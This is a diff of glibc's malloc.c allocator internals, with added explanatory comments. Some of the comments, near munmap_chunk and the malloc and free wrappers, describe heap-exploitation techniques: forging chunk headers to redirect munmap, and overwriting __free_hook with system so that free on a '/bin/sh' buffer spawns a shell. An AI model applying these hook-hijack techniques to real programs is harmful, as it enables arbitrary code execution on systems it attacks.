+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+                  p->prev_size = correction;
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          arena_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          arena_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not the first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If we have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space..  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+                      chunk_at_offset (old_top, old_size)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      chunk_at_offset (old_top, old_size + 2 * SIZE_SZ)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
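+
+/* Worked example (illustrative, assuming a 64-bit build where SIZE_SZ == 8,
+   MINSIZE == 0x20, pagesize == 0x1000 and the default top_pad of 0x20000):
+   the first small request, say nb == 0x20, reaches sysmalloc with
+   old_size == 0.  size becomes 0x20 + 0x20000 + 0x20 == 0x20040, which
+   ALIGN_UP rounds to 0x21000, so MORECORE (sbrk) extends the break by
+   0x21000 bytes.  The split at the bottom of the function then hands back a
+   0x20-byte chunk and leaves a top chunk of 0x21000 - 0x20 == 0x20fe0 bytes
+   with PREV_INUSE set.  */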
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if the first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
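+
+/* Worked example (illustrative, 64-bit, pagesize 0x1000, pad equal to the
+   default top_pad of 0x20000): with a 0x21000-byte top chunk,
+   top_area == 0x21000 - 0x20 - 1 == 0x20fdf and
+   ALIGN_DOWN (0x20fdf - 0x20000, 0x1000) == 0, so nothing is released.
+   With a 0x42000-byte top chunk the same computation gives
+   ALIGN_DOWN (0x21fdf, 0x1000) == 0x21000, and sbrk (-0x21000) is attempted
+   provided no foreign sbrk has moved the break in the meantime.  */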
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - p->prev_size;
+  size_t total_size = p->prev_size + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least), so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
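+
+/* Illustrative note: for an mmapped chunk, prev_size records the unused gap
+   at the front of the mapping, so BLOCK is the start of the mapping itself.
+   In the common 64-bit case prev_size == 0 and the size field equals the
+   page-rounded mapping length, so block == p, total_size is page-aligned,
+   the check above passes and the whole mapping is unmapped.  Only page
+   alignment is verified here, so a forged prev_size/size pair on a chunk
+   with IS_MMAPPED set can redirect the munmap at other page-aligned
+   regions.  */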
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = p->prev_size;
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert ((p->prev_size == offset));
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
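+
+/* Illustrative sketch (not part of the upstream source): __malloc_hook is
+   read and called before any other work, with no validation of the stored
+   pointer.  A debugging hook therefore has exactly the shape sketched below,
+   and the same property is what makes the hook a classic overwrite target
+   when attacking this vintage of the allocator.  */
+#if 0   /* example only, never compiled */
+static void *
+example_malloc_hook (size_t bytes, const void *caller)
+{
+  /* Runs instead of the allocator proper; whatever it returns is what the
+     caller of malloc receives.  */
+  return NULL;
+}
+#endif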
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* see if the dynamic brk/mmap threshold needs adjusting */
+      if (!mp_.no_dyn_threshold
+          && p->size > mp_.mmap_threshold
+          && p->size <= DEFAULT_MMAP_THRESHOLD_MAX)
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
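+
+/* Illustrative note: as with malloc, the __free_hook pointer is fetched and
+   invoked before free performs any sanity check on the chunk, and it
+   receives the raw argument of free.  If the hook slot were overwritten with
+   the address of system, free (ptr) on a buffer containing "/bin/sh" would
+   behave like system ("/bin/sh"); this is the standard hook-hijack primitive
+   against this vintage of the allocator.  */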
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    ar_ptr = arena_for_chunk (oldp);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+      || __builtin_expect (misaligned_chunk (oldp), 0))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  (void) mutex_lock (&ar_ptr->mutex);
